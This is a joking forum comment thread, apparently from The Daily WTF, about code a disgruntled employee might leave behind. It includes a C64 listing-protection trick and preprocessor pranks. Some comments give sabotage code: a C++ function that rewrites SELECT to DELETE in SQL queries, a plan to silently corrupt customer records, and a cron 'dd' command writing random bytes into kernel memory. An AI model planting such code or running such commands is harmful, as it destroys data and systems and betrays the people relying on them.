    On random lines, write your code. For instance, 10, 12, 16, 23, 32, 37, etc. On all lines in-between, put a REM statement where you traverse the keyboard from qwert through vbnm, holding in the function key (I think it was a Commodore key actually) which produces the special characters often used in line drawing and such. Then, traverse the keys again from top to bottom. When you do a LIST on the program and it hits one of those lines, you'll get a ?SYNTAX ERROR and the listing will stop. The only way to see the real code is to list line numbers one-by-one until you get all the lines which don't contain the REMark.

    I never drilled down to find the actual keycode which causes the bug, hence my brute-force method of using all the keys. Maybe someone has already discovered the bug and simplified the REM statement...

    Why so complicated?

    The relevant statement was simply REM (Shift-L); the Shift-L produces a line-drawing character that looks like a slightly enlarged "L". You could put the statement on each line after the real code; there is no need for additional lines.

    This was very well known in the C64 community.

    The culprit is a point in the OS code where the programmers saved one (!) byte by doing a relative jump instead of an absolute one, assuming some value in the accumulator (the main register) of the 6510 CPU. With the Shift-L character this failed (I can't remember the exact reason, most likely an overflow) and the code fell through the conditional jump statement, right into the "Syntax error" subroutine, which happened to be the next piece of assembler code.

    I even wrote a one-liner (!) using two of the most classic tricks on the C64 (1. copy the OS into RAM, 2. encode the resulting assembler in printable characters and print it into memory) and corrected the jump, which enabled me to simply list all those "protected" source codes without having to resort to one of those existing programs which removed all REMs :o)

  • VB User (unregistered)

    My submission: ON ERROR RESUME NEXT

    "But boss, this is how I learned to write VB." Bonus points if you comment it with "This should never happen."

  • (cs) in reply to Ivan Ivanovich
    Ivan Ivanovich:
    // maybe I needing later
    Thinking the same thing; one of the worst things a disgruntled employee could leave behind has already appeared on this site: http://thedailywtf.com/Articles/Maybe-I-Needing-Later.aspx
  • Student (unregistered) in reply to hoodaticus

    hoodaticus:
    C-Octothorpe:
    sheep hurr durr:
    Rosuav:
    -- snip --

    I've been doing this software development thing for years now, and I still giggle a little when I read "private members"... Is that just me?
    Me too. Looks like I have another twin on here.

    "You said private... huh huh huh huh".

    A CS professor at Brigham Young (of all places) gave us a lecture on "pubic" inheritance in C++. We didn't notice his glaring, and increasingly funny, mistakes until the end of the lecture.

  • anon (unregistered) in reply to Sten
    Sten:
    Sobriquet:
    It will also make the library mysteriously fail to interoperate with other versions that were compiled without the redefinition. In a big app, this would be a nightmare.

    That’s not true.

    #define private public
    does not change ABI in any way since the classes do not change memory layout. I use it from time to time since some library developers are morons that define everything private and have never experienced any problem with that.

    So much for encapsulation...
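
    The usual incantation, for the record (header name made up; formally it's undefined behaviour to #define a keyword, it just happens to work on the common ABIs):

    // In a test/debug translation unit only, before including the offending header:
    #define private public
    #define protected public
    #include "third_party_widget.h"   // hypothetical header you can't change
    #undef protected
    #undef private

    // The test code can now poke at internals directly; since access specifiers
    // don't change object layout on the usual ABIs, it still links against the
    // normally-built library.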

  • I use grep (unregistered)
    "rumor has it that a disgruntled employee once left #define true false in a random header file in the codebase. Given our codebase, that would be a lot harder to debug than one might think."

    If you can't run a grep -r "true.*false" * or similar on your codebase...I'm sorry.

  • biff (unregistered) in reply to Sten
    Sten:
    Anon.:
    If recompiling is an option...

    Why not recompile a version of PHP's mysql library so that when mysql_query is run and finds a SELECT command, one time out of 10,000 (for really busy systems that might be too low by a few orders of magnitude; let's say one in 10,000,000,000 runs) it sends "DROP TABLE $table" instead?

    Or maybe just replace the word SELECT with DELETE (it can be done without copying since both have the same length).

    I have always liked the concept of occasionally, randomly deleting small things like customer order records and customer line items, modifying part numbers, decreasing order quantities, delaying delivery dates...

    Preferably just before routine exit, when the user is done with that record and won't be looking at it for some time to come... hopefully long enough for the changes to propagate throughout the backups.
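
    Sten's in-place swap really is trivial; roughly (hypothetical hook function):

    #include <cstring>

    // Both keywords are six characters, so the query buffer never has to grow.
    void corrupt_query(char *sql)
    {
        if (char *p = std::strstr(sql, "SELECT"))
            std::memcpy(p, "DELETE", 6);   // overwrite in place, same length
    }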

  • Amadeus Schubelgruber (unregistered)

    There are a few static analyzers/checkers for C++, such as PRQAC++, that can detect redefinitions of reserved words, types, the standard library, the STL, etc. Most, if not all, of these techniques can be detected easily.

  • HQM (unregistered)

    #define struct union

  • (cs) in reply to I use grep
    I use grep:
    "rumor has it that a disgruntled employee once left #define true false in a random header file in the codebase. Given our codebase, that would be a lot harder to debug than one might think."

    If you can't run a grep -r "true.*false" * or similar on your codebase...I'm sorry.

    Please let this be a (very bad) joke. He didn't say he couldn't "find where he put it". He said it would be very difficult to debug: to find out that it actually HAD been done in the first place.

  • Bishiboosh (unregistered) in reply to Cipri
    Cipri:
    I'd have to go with making a cronjob running
    dd if=/dev/urandom of=/dev/kmem bs=1 count=1 seek=$RANDOM
    

    Replace a random bit of kernel memory with a random value.

    Except /dev/kmem isn't usable anymore in most recent distros :'(

  • Paula (unregistered)

    function paula() {
        if (Math.random() > .5)
            return "Awesome";
        else
            return "Awesomer";
    }
